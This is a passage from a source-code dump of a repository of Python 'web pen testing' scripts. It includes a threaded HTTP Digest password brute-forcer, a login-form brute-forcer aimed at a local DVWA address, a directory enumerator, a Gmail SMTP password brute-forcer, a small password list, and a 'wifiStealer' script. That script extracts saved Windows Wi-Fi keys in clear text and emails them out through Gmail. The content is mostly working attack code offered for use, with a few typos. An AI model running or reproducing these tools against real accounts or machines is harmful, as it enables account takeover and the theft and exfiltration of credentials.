= requests.get(self.url, auth=HTTPDigestAuth(self.user, self.password)) 42 | 43 | if r.status_code == 200: 44 | hit = "0" 45 | print("[+] Password Found - " + self.password) 46 | sys.exit() 47 | else: 48 | print("[-] Not Valid Password: " + self.password) 49 | i[0] = i[0] - 1 50 | except Exception as e: 51 | print(e) 52 | 53 | def start(argv): 54 | banner() 55 | if len(sys.argv) < 5: 56 | usage() 57 | sys.exit() 58 | 59 | try: 60 | opts, args = getopt.getopt(argv, "u:w:f:m:t") 61 | except getopt.Getopterror: 62 | print("[-] Invalid Arguments") 63 | sys.exit() 64 | 65 | method = "" 66 | user = "" 67 | url = "" 68 | threads = 0 69 | for opt, arg in opts: 70 | if opt == '-u': 71 | user = arg 72 | elif opt == '-t': 73 | threads = arg 74 | elif opt == '-w': 75 | url = arg 76 | elif opt == '-f': 77 | dictionary = arg 78 | elif opt == '-m': 79 | method = arg 80 | 81 | try: 82 | f = open(dictionary, "r") 83 | passwords = f.readlines() 84 | except: 85 | print("[-] Error. File Does Not Exist") 86 | sys.exit() 87 | 88 | launchThreads(passwords, threads, user, url, method) 89 | 90 | def launchThreads(passwords, threads, user, url, method): 91 | global i 92 | i = [] 93 | i.append(0) 94 | while len(passwords): 95 | if hit == "1": 96 | try: 97 | if i[0] < int(threads): 98 | password = passwords.pop(0) 99 | i[0] = i[0] + 1 100 | thread = request_performer(password, user, url, method) 101 | thread.start() 102 | 103 | except KeyboardInterrupt: 104 | print("Program Interrupted") 105 | sys.exit() 106 | thread.join() 107 | 108 | if __name__ == "__main__": 109 | try: 110 | start(sys.argv[1:]) 111 | except KeyboardInterrupt: 112 | print("[-] Program Interrupted") 113 | -------------------------------------------------------------------------------- /Web_Pen_Testing_Scripts/bruteforcer.py: -------------------------------------------------------------------------------- 1 | #/usr/bin/python 2 | # Written By: Sahar Hathiramani 3 | # Date: 01/24/2021 4 | 5 | import requests 6 | from termcolor import colored 7 | 8 | def bruteforce(username, url): 9 | for password in passwords: 10 | password = password.strip('\n') 11 | print(colored("Trying Password: %s" % password, "yellow")) 12 | dataDict = {"username":username, "password":password, "Login":"submit"} 13 | response = requests.post(url, data=dataDict) 14 | if b"Login failed" in response.content: 15 | pass 16 | else: 17 | print(colored("[+] Username --> " + username, "green")) 18 | print(colored("[+] Password --> " + password, "green")) 19 | exit() 20 | 21 | page_url = "http://192.168.7.120/dvwa/login.php" 22 | username = input("Enter Username For Specified Page: ") 23 | 24 | with open("passwordList.txt", "r") as passwords: 25 | bruteforce(username, page_url) 26 | 27 | print(colored("[-] Password Not Found in List", "red")) 28 | 29 | -------------------------------------------------------------------------------- /Web_Pen_Testing_Scripts/directoryDiscover.py: -------------------------------------------------------------------------------- 1 | #/usr/bin/python 2 | # Written By: Sahar Hathiramani 3 | # Date: 01/24/2021 4 | 5 | import requests 6 | 7 | def request(url): 8 | try: 9 | return requests.get("http://" + url) 10 | except requests.exceptions.ConnectionError: 11 | pass 12 | 13 | targetURL = input("Enter Target URL: ") 14 | file = open("common.txt", "r") 15 | for line in file: 16 | line = line.strip('\n') 17 | fullURL = targetURL + "/" + line 18 | response = request(fullURL) 19 | if response: 20 | print('[+] Discovered Directory at Link: ' + fullURL) 21 | -------------------------------------------------------------------------------- /Web_Pen_Testing_Scripts/gmailBruteforce.py: -------------------------------------------------------------------------------- 1 | #/usr/bin/python 2 | # Written By: Sahar Hathiramani 3 | # Date: 01/24/2021 4 | 5 | import smtplib 6 | from termcolor import colored 7 | 8 | smtpServer = smtplib.SMTP("smtp.gmail.com", 587) 9 | smtpServer.ehlo() 10 | smtpServer.starttls() 11 | 12 | user = input("Enter Target Email Address: ") 13 | file = input("Enter Path to Password File: ") 14 | passwordFile = open(file, "r") 15 | 16 | for password in passwordFile: 17 | password = password.strip('\n') 18 | try: 19 | smtpServer.login(user, password) 20 | print(colored('[+] Password Found: %s' % password, "green")) 21 | except smtplib.SMTPAuthenticationError: 22 | print(colored('[-] Wrond Password: %s' % password, "red")) 23 | 24 | -------------------------------------------------------------------------------- /Web_Pen_Testing_Scripts/passwordList.txt: -------------------------------------------------------------------------------- 1 | admin 2 | administrator 3 | password 4 | Password1 5 | qwerty 6 | helloworld 7 | Test1234! 8 | -------------------------------------------------------------------------------- /Web_Pen_Testing_Scripts/wifiStealer.py: -------------------------------------------------------------------------------- 1 | #/usr/bin/python 2 | # Written By: Sahar Hathiramani 3 | # Date: 01/24/2021 4 | 5 | import subprocess 6 | import smtplib 7 | import re 8 | 9 | command = "netsh wlan show profile" 10 | networks = subprocess.check_output(command, shell=True) 11 | networkList = re.findall('(?:profile\s*:\s)(.*)' , networks) 12 | 13 | finalOutput = "" 14 | for network in networkList: 15 | showKey = "netsh wlan show profile " + network + "key=clear" 16 | oneNetworkResult = subprocess.check_output(showKey, shell=True) 17 | finalOutput += oneNetworkResult 18 | 19 | #Have Output Sent as an Email 20 | server = smptlib.smpt("smtp.gmail.com", 587) 21 | server.starttls() 22 | server.login(email,password) 23 | server.sendmail(email, email, finalOutput) 24 | 25 | #Have Output Saved to File 26 | file = open("wifiPasswords.txt", "w") 27 | file.write(finalOutput) 28 | file.close() 29 | --------------------------------------------------------------------------------